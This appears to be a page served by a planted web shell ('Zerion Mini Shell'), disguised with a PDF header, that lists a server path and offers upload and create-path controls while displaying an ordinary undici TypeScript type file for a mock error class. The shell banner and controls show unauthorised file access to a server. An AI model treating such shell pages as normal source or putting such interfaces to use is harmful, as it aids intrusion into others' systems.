%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/node_modules/undici/types/
Upload File :
Create Path :
Current File : //usr/share/node_modules/undici/types/mock-errors.d.ts

import Errors from './errors'

export default MockErrors

declare namespace MockErrors {
  /** The request does not match any registered mock dispatches. */
  export class MockNotMatchedError extends Errors.UndiciError {
    constructor(message?: string);
    name: 'MockNotMatchedError';
    code: 'UND_MOCK_ERR_MOCK_NOT_MATCHED';
  }
}

Zerion Mini Shell 1.0